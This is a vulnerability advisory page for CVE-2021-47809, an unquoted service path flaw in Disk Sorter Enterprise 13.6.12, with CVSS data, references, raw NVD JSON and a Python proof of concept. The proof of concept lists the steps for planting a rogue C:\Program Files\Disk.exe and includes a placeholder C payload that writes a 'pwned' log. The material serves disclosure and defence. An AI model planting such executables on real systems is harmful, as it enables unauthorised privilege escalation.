CVE-2021-47809

Description

Disk Sorter Enterprise 13.6.12 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe' to inject malicious executables and escalate privileges.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:flexense:disk_sorter:13.6.12:*:*:*:enterprise:*:*:* - VULNERABLE

Disk Sorter Enterprise 13.6.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2021-47809 PoC - Disk Sorter Enterprise Unquoted Service Path
# Author: Security Researcher
# Note: This is for educational and authorized testing purposes only

import os
import sys
import subprocess
import time

def check_vulnerability():
    """Check if the vulnerable service exists"""
    service_name = "DiskSorterEnterprise"
    service_path = r"C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe"
    
    print(f"[*] Checking for vulnerable service: {service_name}")
    print(f"[*] Service binary path: {service_path}")
    
    # Check if path contains spaces and is not quoted
    if ' ' in service_path and not service_path.startswith('"'):
        print("[+] Service path is unquoted - vulnerability may exist")
        return True
    return False

def create_malicious_executable():
    """Create a malicious executable to be placed in the unquoted path"""
    malicious_path = r"C:\Program Files\Disk.exe"
    
    # Create a simple reverse shell or payload
    # This is a placeholder - actual implementation would contain actual malicious code
    payload_code = '''
#include <windows.h>
#include <stdio.h>

int main() {
    // This would contain actual malicious payload
    // For demonstration, just create a log file
    FILE *fp = fopen("C:\\\\temp\\\\pwned.log", "w");
    if (fp) {
        fprintf(fp, "Exploited by CVE-2021-47809 at %s\\n", __TIMESTAMP__);
        fclose(fp);
    }
    // Spawn original service and exit
    WinExec("C:\\\\Program Files\\\\Disk Sorter Enterprise\\\\bin\\\\disksrs.exe", SW_HIDE);
    return 0;
}
'''
    
    print(f"[!] In real attack, malicious executable would be created at: {malicious_path}")
    print("[!] This PoC does not create any malicious files")
    return True

def exploit():
    """Main exploitation function"""
    print("=" * 60)
    print("CVE-2021-47809 - Disk Sorter Enterprise Unquoted Service Path")
    print("=" * 60)
    
    if not check_vulnerability():
        print("[-] Target is not vulnerable")
        return False
    
    create_malicious_executable()
    
    print("\n[*] Attack requires:")
    print("    1. Write access to C:\\\\Program Files\\\\ directory")
    print("    2. Ability to restart the DiskSorter service")
    print("    3. Place malicious Disk.exe in the path")
    print("    4. Wait for service restart")
    
    return True

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47809
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47809
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47809/
[4] VulDB https://vuldb.com/cve/CVE-2021-47809
[5] https://www.disksorter.com
[6] https://www.exploit-db.com/exploits/50014
[7] https://www.vulncheck.com/advisories/disk-sorter-enterprise-disk-sorter-enterprise-unquoted-service-path
[8] https://www.exploit-db.com/exploits/50014

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47809", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:25.893", "lastModified": "2026-01-30T00:50:40.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Disk Sorter Enterprise 13.6.12 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\\Program Files\\Disk Sorter Enterprise\\bin\\disksrs.exe' to inject malicious executables and escalate privileges."}, {"lang": "es", "value": "Disk Sorter Enterprise 13.6.12 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su servicio de Windows que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files\\Disk Sorter Enterprise\\bin\\disksrs.exe' para inyectar ejecutables maliciosos y escalar privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flexense:disk_sorter:13.6.12:*:*:*:enterprise:*:*:*", "matchCriteriaId": "612474D0-6956-4B85-A95D-8D95BBBCF9BF"}]}]}], "references": [{"url": "https://www.disksorter.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50014", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/disk-sorter-enterprise-disk-sorter-enterprise-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50014", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}